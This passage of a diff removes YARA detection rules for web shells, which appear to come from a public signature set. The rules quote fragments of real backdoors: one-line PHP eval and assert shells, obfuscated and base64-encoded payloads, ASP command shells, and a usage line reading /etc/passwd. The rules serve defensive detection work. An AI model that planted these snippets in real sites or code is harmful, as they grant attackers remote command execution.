-}
-rule webshell_webshells_new_make2 {
-	meta:
-		description = "Web shells - generated from file make2.php"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		hash = "9af195491101e0816a263c106e4c145e"
-		score = 50
-	strings:
-		$s1 = "error_reporting(0);session_start();header(\"Content-type:text/html;charset=utf-8"
-	condition:
-		all of them
-}
-rule webshell_webshells_new_aaa {
-	meta:
-		description = "Web shells - generated from file aaa.asp"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "68483788ab171a155db5266310c852b2"
-	strings:
-		$s0 = "Function fvm(jwv):If jwv=\"\"Then:fvm=jwv:Exit Function:End If:Dim tt,sru:tt=\""
-		$s5 = "<option value=\"\"DROP TABLE [jnc];exec mast\"&kvp&\"er..xp_regwrite 'HKEY_LOCAL"
-		$s17 = "if qpv=\"\" then qpv=\"x:\\Program Files\\MySQL\\MySQL Server 5.0\\my.ini\"&br&"
-	condition:
-		1 of them
-}
-rule webshell_Expdoor_com_ASP {
-	meta:
-		description = "Web shells - generated from file Expdoor.com ASP.asp"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "caef01bb8906d909f24d1fa109ea18a7"
-	strings:
-		$s4 = "\">www.Expdoor.com</a>" fullword
-		$s5 = "    <input name=\"FileName\" type=\"text\" value=\"Asp_ver.Asp\" size=\"20\" max"
-		$s10 = "set file=fs.OpenTextFile(server.MapPath(FileName),8,True)  '" fullword
-		$s14 = "set fs=server.CreateObject(\"Scripting.FileSystemObject\")   '" fullword
-		$s16 = "<TITLE>Expdoor.com ASP" fullword
-	condition:
-		2 of them
-}
-rule webshell_webshells_new_php2 {
-	meta:
-		description = "Web shells - generated from file php2.php"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "fbf2e76e6f897f6f42b896c855069276"
-	strings:
-		$s0 = "<?php $s=@$_GET[2];if(md5($s.$s)=="
-	condition:
-		all of them
-}
-rule webshell_bypass_iisuser_p {
-	meta:
-		description = "Web shells - generated from file bypass-iisuser-p.asp"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "924d294400a64fa888a79316fb3ccd90"
-	strings:
-		$s0 = "<%Eval(Request(chr(112))):Set fso=CreateObject"
-	condition:
-		all of them
-}
-rule webshell_sig_404super {
-	meta:
-		description = "Web shells - generated from file 404super.php"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "7ed63176226f83d36dce47ce82507b28"
-	strings:
-		$s4 = "$i = pack('c*', 0x70, 0x61, 99, 107);" fullword
-		$s6 = "    'h' => $i('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631')," fullword
-		$s7 = "//http://require.duapp.com/session.php" fullword
-		$s8 = "if(!isset($_SESSION['t'])){$_SESSION['t'] = $GLOBALS['f']($GLOBALS['h']);}" fullword
-		$s12 = "//define('pass','123456');" fullword
-		$s13 = "$GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSIO"
-	condition:
-		1 of them
-}
-rule webshell_webshells_new_JSP {
-	meta:
-		description = "Web shells - generated from file JSP.jsp"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "495f1a0a4c82f986f4bdf51ae1898ee7"
-	strings:
-		$s1 = "void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"
-		$s5 = "bw.write(z2);bw.close();sb.append(\"1\");}else if(Z.equals(\"E\")){EE(z1);sb.app"
-		$s11 = "if(Z.equals(\"A\")){String s=new File(application.getRealPath(request.getRequest"
-	condition:
-		1 of them
-}
-rule webshell_webshell_123 {
-	meta:
-		description = "Web shells - generated from file webshell-123.php"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "2782bb170acaed3829ea9a04f0ac7218"
-	strings:
-		$s0 = "// Web Shell!!" fullword
-		$s1 = "@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6"
-		$s3 = "$default_charset = \"UTF-8\";" fullword
-		$s4 = "// url:http://www.weigongkai.com/shell/" fullword
-	condition:
-		2 of them
-}
-rule webshell_dev_core {
-	meta:
-		description = "Web shells - generated from file dev_core.php"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "55ad9309b006884f660c41e53150fc2e"
-	strings:
-		$s1 = "if (strpos($_SERVER['HTTP_USER_AGENT'], 'EBSD') == false) {" fullword
-		$s9 = "setcookie('key', $_POST['pwd'], time() + 3600 * 24 * 30);" fullword
-		$s10 = "$_SESSION['code'] = _REQUEST(sprintf(\"%s?%s\",pack(\"H*\",'6874"
-		$s11 = "if (preg_match(\"/^HTTP\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))"
-		$s12 = "eval(gzuncompress(gzuncompress(Crypt::decrypt($_SESSION['code'], $_C"
-		$s15 = "if (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))"
-	condition:
-		1 of them
-}
-rule webshell_webshells_new_pHp {
-	meta:
-		description = "Web shells - generated from file pHp.php"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "b0e842bdf83396c3ef8c71ff94e64167"
-	strings:
-		$s0 = "if(is_readable($path)) antivirus($path.'/',$exs,$matches);" fullword
-		$s1 = "'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr"
-		$s13 = "'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*"
-		$s14 = "'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+"
-		$s19 = "'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_once"
-	condition:
-		1 of them
-}
-rule webshell_webshells_new_pppp {
-	meta:
-		description = "Web shells - generated from file pppp.php"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "cf01cb6e09ee594545693c5d327bdd50"
-	strings:
-		$s0 = "Mail: chinese@hackermail.com" fullword
-		$s3 = "if($_GET[\"hackers\"]==\"2b\"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "
-		$s6 = "Site: http://blog.weili.me" fullword
-	condition:
-		1 of them
-}
-rule webshell_webshells_new_code {
-	meta:
-		description = "Web shells - generated from file code.php"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "a444014c134ff24c0be5a05c02b81a79"
-	strings:
-		$s1 = "<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi"
-		$s7 = "$file = !empty($_POST[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_PO"
-		$s10 = "if (true==@move_uploaded_file($_FILES['userfile']['tmp_name'],self::convert_"
-		$s14 = "Processed in <span id=\"runtime\"></span> second(s) {gzip} usage:"
-		$s17 = "<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm"
-	condition:
-		1 of them
-}
-rule webshell_webshells_new_jspyyy {
-	meta:
-		description = "Web shells - generated from file jspyyy.jsp"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "b291bf3ccc9dac8b5c7e1739b8fa742e"
-	strings:
-		$s0 = "<%@page import=\"java.io.*\"%><%if(request.getParameter(\"f\")"
-	condition:
-		all of them
-}
-rule webshell_webshells_new_xxxx {
-	meta:
-		description = "Web shells - generated from file xxxx.php"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "5bcba70b2137375225d8eedcde2c0ebb"
-	strings:
-		$s0 = "<?php eval($_POST[1]);?>  " fullword
-	condition:
-		all of them
-}
-rule webshell_webshells_new_JJjsp3 {
-	meta:
-		description = "Web shells - generated from file JJjsp3.jsp"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "949ffee1e07a1269df7c69b9722d293e"
-	strings:
-		$s0 = "<%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!S"
-	condition:
-		all of them
-}
-rule webshell_webshells_new_PHP1 {
-	meta:
-		description = "Web shells - generated from file PHP1.php"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "14c7281fdaf2ae004ca5fec8753ce3cb"
-	strings:
-		$s0 = "<[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?>" fullword
-		$s2 = ":https://forum.90sec.org/forum.php?mod=viewthread&tid=7316" fullword
-		$s3 = "@preg_replace(\"/f/e\",$_GET['u'],\"fengjiao\"); " fullword
-	condition:
-		1 of them
-}
-rule webshell_webshells_new_JJJsp2 {
-	meta:
-		description = "Web shells - generated from file JJJsp2.jsp"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "5a9fec45236768069c99f0bfd566d754"
-	strings:
-		$s2 = "QQ(cs, z1, z2, sb,z2.indexOf(\"-to:\")!=-1?z2.substring(z2.indexOf(\"-to:\")+4,z"
-		$s8 = "sb.append(l[i].getName() + \"/\\t\" + sT + \"\\t\" + l[i].length()+ \"\\t\" + sQ"
-		$s10 = "ResultSet r = s.indexOf(\"jdbc:oracle\")!=-1?c.getMetaData()"
-		$s11 = "return DriverManager.getConnection(x[1].trim()+\":\"+x[4],x[2].equalsIgnoreCase("
-	condition:
-		1 of them
-}
-rule webshell_webshells_new_radhat {
-	meta:
-		description = "Web shells - generated from file radhat.asp"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "72cb5ef226834ed791144abaa0acdfd4"
-	strings:
-		$s1 = "sod=Array(\"D\",\"7\",\"S"
-	condition:
-		all of them
-}
-rule webshell_webshells_new_asp1 {
-	meta:
-		description = "Web shells - generated from file asp1.asp"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "b63e708cd58ae1ec85cf784060b69cad"
-	strings:
-		$s0 = " http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave " fullword
-		$s2 = " <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %>" fullword
-	condition:
-		1 of them
-}
-rule webshell_webshells_new_php6 {
-	meta:
-		description = "Web shells - generated from file php6.php"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "ea75280224a735f1e445d244acdfeb7b"
-	strings:
-		$s1 = "array_map(\"asx73ert\",(ar"
-		$s3 = "preg_replace(\"/[errorpage]/e\",$page,\"saft\");" fullword
-		$s4 = "shell.php?qid=zxexp  " fullword
-	condition:
-		1 of them
-}
-rule webshell_webshells_new_xxx {
-	meta:
-		description = "Web shells - generated from file xxx.php"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "0e71428fe68b39b70adb6aeedf260ca0"
-	strings:
-		$s3 = "<?php array_map(\"ass\\x65rt\",(array)$_REQUEST['expdoor']);?>" fullword
-	condition:
-		all of them
-}
-rule webshell_GetPostpHp {
-	meta:
-		description = "Web shells - generated from file GetPostpHp.php"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "20ede5b8182d952728d594e6f2bb5c76"
-	strings:
-		$s0 = "<?php eval(str_rot13('riny($_CBFG[cntr]);'));?>" fullword
-	condition:
-		all of them
-}
-rule webshell_webshells_new_php5 {
-	meta:
-		description = "Web shells - generated from file php5.php"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "cf2ab009cbd2576a806bfefb74906fdf"
-	strings:
-		$s0 = "<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_u"
-	condition:
-		all of them
-}
-rule webshell_webshells_new_PHP {
-	meta:
-		description = "Web shells - generated from file PHP.php"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "a524e7ae8d71e37d2fd3e5fbdab405ea"
-	strings:
-		$s1 = "echo \"<font color=blue>Error!</font>\";" fullword
-		$s2 = "<input type=\"text\" size=61 name=\"f\" value='<?php echo $_SERVER[\"SCRIPT_FILE"
-		$s5 = " - ExpDoor.com</title>" fullword
-		$s10 = "$f=fopen($_POST[\"f\"],\"w\");" fullword
-		$s12 = "<textarea name=\"c\" cols=60 rows=15></textarea><br>" fullword
-	condition:
-		1 of them
-}
-rule webshell_webshells_new_Asp {
-	meta:
-		description = "Web shells - generated from file Asp.asp"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "32c87744ea404d0ea0debd55915010b7"
-	strings:
-		$s1 = "Execute MorfiCoder(\")/*/z/*/(tseuqer lave\")" fullword
-		$s2 = "Function MorfiCoder(Code)" fullword
-		$s3 = "MorfiCoder=Replace(Replace(StrReverse(Code),\"/*/\",\"\"\"\"),\"\\*\\\",vbCrlf)" fullword
-	condition:
-		1 of them
-}
-
-
-rule WebShell_cgi {
-	meta:
-		description = "Semi-Auto-generated  - file WebShell.cgi.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "bc486c2e00b5fc3e4e783557a2441e6f"
-	strings:
-		$s0 = "WebShell.cgi"
-		$s2 = "<td><code class=\"entry-[% if entry.all_rights %]mine[% else"
-	condition:
-		all of them
-}
-rule WinX_Shell_html {
-	meta:
-		description = "Semi-Auto-generated  - file WinX Shell.html.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "17ab5086aef89d4951fe9b7c7a561dda"
-	strings:
-		$s0 = "WinX Shell"
-		$s1 = "Created by greenwood from n57"
-		$s2 = "<td><font color=\\\"#990000\\\">Win Dir:</font></td>"
-	condition:
-		2 of them
-}
-
-
-rule Dx_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file Dx.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "9cfe372d49fe8bf2fac8e1c534153d9b"
-	strings:
-		$s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
-		$s2 = "$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Util"
-		$s3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTTP"
-	condition:
-		1 of them
-}
-rule csh_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file csh.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "194a9d3f3eac8bc56d9a7c55c016af96"
-	strings:
-		$s0 = ".::[c0derz]::. web-shell"
-		$s1 = "http://c0derz.org.ua"
-		$s2 = "vint21h@c0derz.org.ua"
-		$s3 = "$name='63a9f0ea7bb98050796b649e85481845';//root"
-	condition:
-		1 of them
-}
-rule pHpINJ_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file pHpINJ.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "d7a4b0df45d34888d5a09f745e85733f"
-	strings:
-		$s1 = "News Remote PHP Shell Injection" 
-		$s3 = "Php Shell <br />" fullword
-		$s4 = "<input type = \"text\" name = \"url\" value = \""
-	condition:
-		2 of them
-}
-rule sig_2008_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file 2008.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "3e4ba470d4c38765e4b16ed930facf2c"
-	strings:
-		$s0 = "Codz by angel(4ngel)"
-		$s1 = "Web: http://www.4ngel.net"
-		$s2 = "$admin['cookielife'] = 86400;"
-		$s3 = "$errmsg = 'The file you want Downloadable was nonexistent';"
-	condition:
-		1 of them
-}
-rule ak74shell_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file ak74shell.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "7f83adcb4c1111653d30c6427a94f66f"
-	strings:
-		$s1 = "$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_SESSION["
-		$s2 = "AK-74 Security Team Web Site: www.ak74-team.net"
-		$s3 = "$xshell"
-	condition:
-		2 of them
-}
-rule Rem_View_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file Rem View.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "29420106d9a81553ef0d1ca72b9934d9"
-	strings:
-		$s0 = "$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\""
-		$s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'"
-		$s4 ="Welcome to phpRemoteView (RemView)"
-	condition:
-		1 of them
-}
-rule Java_Shell_js {
-	meta:
-		description = "Semi-Auto-generated  - file Java Shell.js.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "36403bc776eb12e8b7cc0eb47c8aac83"
-	strings:
-		$s2 = "PySystemState.initialize(System.getProperties(), null, argv);" fullword
-		$s3 = "public class JythonShell extends JPanel implements Runnable {" fullword
-		$s4 = "public static int DEFAULT_SCROLLBACK = 100"
-	condition:
-		2 of them
-}
-rule STNC_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file STNC.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "2e56cfd5b5014cbbf1c1e3f082531815"
-	strings:
-		$s0 = "drmist.ru" fullword
-		$s1 = "hidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80"
-		$s2 = "STNC WebShell"
-		$s3 = "http://www.security-teams.net/index.php?showtopic="
-	condition:
-		1 of them
-}
-rule aZRaiLPhp_v1_0_php {
-	meta:
-		description = "Semi-Auto-generated  - file aZRaiLPhp v1.0.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "26b2d3943395682e36da06ed493a3715"
-	strings:
-		$s0 = "azrailphp"
-		$s1 = "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>"
-		$s3 = "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>"
-	condition:
-		2 of them
-}
-rule Moroccan_Spamers_Ma_EditioN_By_GhOsT_php {
-	meta:
-		description = "Semi-Auto-generated  - file Moroccan Spamers Ma-EditioN By GhOsT.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "d1b7b311a7ffffebf51437d7cd97dc65"
-	strings:
-		$s0 = ";$sd98=\"john.barker446@gmail.com\""
-		$s1 = "print \"Sending mail to $to....... \";"
-		$s2 = "<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei"
-	condition:
-		1 of them
-}
-rule zacosmall_php {
-	meta:
-		description = "Semi-Auto-generated  - file zacosmall.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "5295ee8dc2f5fd416be442548d68f7a6"
-	strings:
-		$s0 = "rand(1,99999);$sj98"
-		$s1 = "$dump_file.='`'.$rows2[0].'`"
-		$s3 = "filename=\\\"dump_{$db_dump}_${table_d"
-	condition:
-		2 of them
-}
-rule CmdAsp_asp {
-	meta:
-		description = "Semi-Auto-generated  - file CmdAsp.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "64f24f09ec6efaa904e2492dffc518b9"
-	strings:
-		$s0 = "CmdAsp.asp" 
-		$s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
-		$s2 = "-- Use a poor man's pipe ... a temp file --" 
-		$s3 = "maceo @ dogmile.com" 
-	condition:
-		2 of them
-}
-rule simple_backdoor_php {
-	meta:
-		description = "Semi-Auto-generated  - file simple-backdoor.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "f091d1b9274c881f8e41b2f96e6b9936"
-	strings:
-		$s0 = "$cmd = ($_REQUEST['cmd']);" fullword
-		$s1 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" 
-		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
-	condition:
-		2 of them
-}
-rule mysql_shell_php {
-	meta:
-		description = "Semi-Auto-generated  - file mysql_shell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "d42aec2891214cace99b3eb9f3e21a63"
-	strings:
-		$s0 = "SooMin Kim"
-		$s1 = "smkim@popeye.snu.ac.kr"
-		$s2 = "echo \"<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablen"
-	condition:
-		1 of them
-}
-rule Dive_Shell_1_0___Emperor_Hacking_Team_php {
-	meta:
-		description = "Semi-Auto-generated  - file Dive Shell 1.0 - Emperor Hacking Team.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "1b5102bdc41a7bc439eea8f0010310a5"
-	strings:
-		$s0 = "Emperor Hacking TEAM"
-		$s1 = "Simshell" fullword
-		$s2 = "ereg('^[[:blank:]]*cd[[:blank:]]"
-		$s3 = "<form name=\"shell\" action=\"<?php echo $_SERVER['PHP_SELF'] ?>\" method=\"POST"
-	condition:
-		2 of them
-}
-rule Asmodeus_v0_1_pl {
-	meta:
-		description = "Semi-Auto-generated  - file Asmodeus v0.1.pl.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "0978b672db0657103c79505df69cb4bb"
-	strings:
-		$s0 = "[url=http://www.governmentsecurity.org"
-		$s1 = "perl asmodeus.pl client 6666 127.0.0.1" 
-		$s2 = "print \"Asmodeus Perl Remote Shell"
-		$s4 = "$internet_addr = inet_aton(\"$host\") or die \"ALOA:$!\\n\";" fullword
-	condition:
-		2 of them
-}
-rule backup_php_often_with_c99shell {
-	meta:
-		description = "Semi-Auto-generated  - file backup.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "aeee3bae226ad57baf4be8745c3f6094"
-	strings:
-		$s0 = "#phpMyAdmin MySQL-Dump" fullword
-		$s2 = ";db_connect();header('Content-Type: application/octetstr"
-		$s4 = "$data .= \"#Database: $database" fullword
-	condition:
-		all of them
-}
-rule Reader_asp {
-	meta:
-		description = "Semi-Auto-generated  - file Reader.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "ad1a362e0a24c4475335e3e891a01731"
-	strings:
-		$s1 = "Mehdi & HolyDemon"
-		$s2 = "www.infilak."
-		$s3 = "'*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width=\"75%"
-	condition:
-		2 of them
-}
-rule phpshell17_php {
-	meta:
-		description = "Semi-Auto-generated  - file phpshell17.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "9a928d741d12ea08a624ee9ed5a8c39d"
-	strings:
-		$s0 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>" fullword
-		$s1 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></"
-		$s2 = "href=\"mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>" fullword
-	condition:
-		1 of them
-}
-rule myshell_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file myshell.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "62783d1db52d05b1b6ae2403a7044490"
-	strings:
-		$s0 = "@chdir($work_dir) or ($shellOutput = \"MyShell: can't change directory."
-		$s1 = "echo \"<font color=$linkColor><b>MyShell file editor</font> File:<font color"
-		$s2 = " $fileEditInfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;Owner: <font color=$"
-	condition:
-		2 of them
-}
-rule SimShell_1_0___Simorgh_Security_MGZ_php {
-	meta:
-		description = "Semi-Auto-generated  - file SimShell 1.0 - Simorgh Security MGZ.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "37cb1db26b1b0161a4bf678a6b4565bd"
-	strings:
-		$s0 = "Simorgh Security Magazine " 
-		$s1 = "Simshell.css"
-		$s2 = "} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], "
-		$s3 = "www.simorgh-ev.com"
-	condition:
-		2 of them
-}
-rule jspshall_jsp {
-	meta:
-		description = "Semi-Auto-generated  - file jspshall.jsp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "efe0f6edaa512c4e1fdca4eeda77b7ee"
-	strings:
-		$s0 = "kj021320"
-		$s1 = "case 'T':systemTools(out);break;"
-		$s2 = "out.println(\"<tr><td>\"+ico(50)+f[i].getName()+\"</td><td> file"
-	condition:
-		2 of them
-}
-rule webshell_php {
-	meta:
-		description = "Semi-Auto-generated  - file webshell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "e425241b928e992bde43dd65180a4894"
-	strings:
-		$s2 = "<die(\"Couldn't Read directory, Blocked!!!\");"
-		$s3 = "PHP Web Shell"
-	condition:
-		all of them
-}
-rule rootshell_php {
-	meta:
-		description = "Semi-Auto-generated  - file rootshell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "265f3319075536030e59ba2f9ef3eac6"
-	strings:
-		$s0 = "shells.dl.am"
-		$s1 = "This server has been infected by $owner"
-		$s2 = "<input type=\"submit\" value=\"Include!\" name=\"inc\"></p>"
-		$s4 = "Could not write to file! (Maybe you didn't enter any text?)"
-	condition:
-		2 of them
-}
-rule connectback2_pl {
-	meta:
-		description = "Semi-Auto-generated  - file connectback2.pl.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "473b7d226ea6ebaacc24504bd740822e"
-	strings:
-		$s0 = "#We Are: MasterKid, AleXutz, FatMan & MiKuTuL                                   "
-		$s1 = "echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shel"
-		$s2 = "ConnectBack Backdoor"
-	condition:
-		1 of them
-}
-rule DefaceKeeper_0_2_php {
-	meta:
-		description = "Semi-Auto-generated  - file DefaceKeeper_0.2.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "713c54c3da3031bc614a8a55dccd7e7f"
-	strings:
-		$s0 = "target fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>" fullword
-		$s1 = "eval(base64_decode(\"ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9"
-		$s2 = "<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center"
-	condition:
-		1 of them
-}
-rule shells_PHP_wso {
-	meta:
-		description = "Semi-Auto-generated  - file wso.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "33e2891c13b78328da9062fbfcf898b6"
-	strings:
-		$s0 = "$back_connect_p=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbi"
-		$s3 = "echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=pos"
-	condition:
-		1 of them
-}
-rule backdoor1_php {
-	meta:
-		description = "Semi-Auto-generated  - file backdoor1.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "e1adda1f866367f52de001257b4d6c98"
-	strings:
-		$s1 = "echo \"[DIR] <A HREF=\\\"\".$_SERVER['PHP_SELF'].\"?rep=\".realpath($rep.\".."
-		$s2 = "class backdoor {"
-		$s4 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?copy=1\\\">Copier un fichier</a> <"
-	condition:
-		1 of them
-}
-rule elmaliseker_asp {
-	meta:
-		description = "Semi-Auto-generated  - file elmaliseker.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "b32d1730d23a660fd6aa8e60c3dc549f"
-	strings:
-		$s0 = "if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & \"@\" & makeText(8) & \".\""
-		$s1 = "<form name=frmCMD method=post action=\"<%=gURL%>\">"
-		$s2 = "dim zombie_array,special_array"
-		$s3 = "http://vnhacker.org"
-	condition:
-		1 of them
-}
-rule indexer_asp {
-	meta:
-		description = "Semi-Auto-generated  - file indexer.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "9ea82afb8c7070817d4cdf686abe0300"
-	strings:
-		$s0 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"
-		$s2 = "D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type=\"submit"
-	condition:
-		1 of them
-}
-rule DxShell_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file DxShell.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "33a2b31810178f4c2e71fbdeb4899244"
-	strings:
-		$s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
-		$s2 = "print \"\\n\".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><"
-	condition:
-		1 of them
-}
-rule s72_Shell_v1_1_Coding_html {
-	meta:
-		description = "Semi-Auto-generated  - file s72 Shell v1.1 Coding.html.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "c2e8346a5515c81797af36e7e4a3828e"
-	strings:
-		$s0 = "Dizin</font></b></font><font face=\"Verdana\" style=\"font-size: 8pt\"><"
